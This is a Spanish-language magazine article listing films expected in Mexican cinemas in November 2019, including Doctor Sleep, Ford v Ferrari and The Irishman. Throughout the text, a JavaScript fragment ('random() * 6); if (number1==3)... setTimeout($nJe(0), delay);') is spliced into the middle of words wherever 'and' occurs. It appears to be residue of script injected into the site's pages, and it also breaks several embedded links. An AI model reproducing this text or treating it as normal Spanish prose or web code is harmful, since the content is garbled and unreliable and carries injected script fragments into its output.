Estrenos de cine más esperados en noviembre en México

    Estrenos de cine más esperados en noviembre en México

    Por fin veremos estas joyas.

    Autor: Redacción Maxim 31 octubre, 2019



    Netflix

     

    ¿QUÉ VER EN EL CINE EN NOVIEMBRE DE 2019 EN MÉXICO?

     

     

    Se acerca la época para cumplir con la lista de deseos del año, y eso incluye tardes y  noches de palomitas frente a la pantalla grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande. 

     

    Si buscas estrenos para el fin de semana del 1,2 y 3 de noviembre, checa los estrenos de cine más esperados en octubre de 2019 en México.

     

     

    Doctor Sueño

    Estreno: 8 de noviembre

     

    Es ni más ni menos que la secuela de El Resplandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andor, la obra maestra de Stanley Kubrick, basada en la novela de Stephen King. Pocos clásicos logran tener una segunda parte del mismo nivel, pero le daremos el beneficio de la duda al director Mike Flanagan (La maldición de Hill House). La historia de Doctor Sueño sucede años después de su precuela, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Dan Torrance (Ewan McGregor) conoce a una joven con poderes similares a los suyos y trata de protegerla de un culto que se aprovecha de niños con poderes.

     

     

     

    Contra lo imposible

    Estreno: 15 de noviembre

     

    Los amantes de la velocidad sabemos que está será una de las películas del año, ya que narra la histórica rivalidad entre Ford y Ferrari. La cinta es dirigida por James Mangold, quien viene de triunfar con Logan, y es protagonizada por dos titanes de la actuación, Christian Bale (Ken Miles) y Matt Damon (Carroll Shelby), quienes interpretan al piloto y el diseñador que luchan contra las leyes de la física y sus propios demonios para construir el revolucionario auto de carreras que desafió a Ferrari en las 24 Horas de Le Mans en 1966.

     

     

     

     

    Ángeles de Charlie

    Estreno: 15 de noviembre

     

    Con esta película se inaugura una nueva saga de esta histórica franquicia. Ahora de la mano de la actriz, escritora y directora Elizabeth Banks (Pitch Perfect 2), se espera que este reinicio tenga un toque menos sexista que sus antecesoras. El famoso trío ahora es conformado por Kristen Stewart, Naomi Scott y Ella Balinska, mientras que Bosley será la misma Elizabeth Banks. En cuanto a la historia, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se descubre una tecnología peligrosa, las Ángeles de Charlie son llamadas a la acción, arriesgandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sus vidas para protegernos a todos. Son unas fregonas.

     

     

    El Irlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andés

    Estreno: 15 de noviembre en cines / 27 de noviembre en Netflix

     

    Primero supimos que sería el gran proyecto de Martin Scorsese para Netflix, después que estaba andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes-libros-que-pronto-se-convertiran-en-peliculas/» target=»_blank» rel=»noopener»>basada en el libro I heard you paint houses de Charles Brandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andt, sobre la vida del líder sindical y truhán Jimmy Hoffa, después supimos que estarían andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes/» target=»_blank» rel=»noopener»>Robert DeNiro, Al Pacino y Joe Pesci. Luego nos enteramos que usarían una nueva tecnología para rejuvenecer rostros y hace poco leímos que muchos críticos consideran a la películaandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes-los-criticos-dicen-que-es-una-obra-maestra-de-scorsese/» target=»_blank» rel=»noopener»> una obra maestra. Después de varios meses de espera en donde nos fuimos enterandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de todo a cuenta gotas, por fin podremos verla. 

     

     

     

    Entre navajas y secretos

    Estreno: 29 de noviembre

     

    Rian Johnson, quien acaba de dirigir una pequeña película independiente llamada Star Wars, dirige esta ingeniosa cinta centrada en la muerte del patriarca de una familia adinerada. Según críticos, la belleza de esta cinta no es solo que las tramas se cruzan en zigzag, ni el elenco fantástico (Daniel Craig, Chris Evans, Jamie Lee Curtis, Ana de Armas, Michael Shannon), sino que el goce de la película no depende de averiguar quién cometió el crimen. Johnson creó un laberinto que te mantiene ocupado durante toda la película, en lugar de esperar la gran revelación. 

     

     

    Si prefieres quedarte en casa, checa estos ESTRENOS DE NOVIEMBRE EN NETFLIX.

     

     

    Temas relacionados con esta nota: , , , ,

Por fin veremos estas joyas.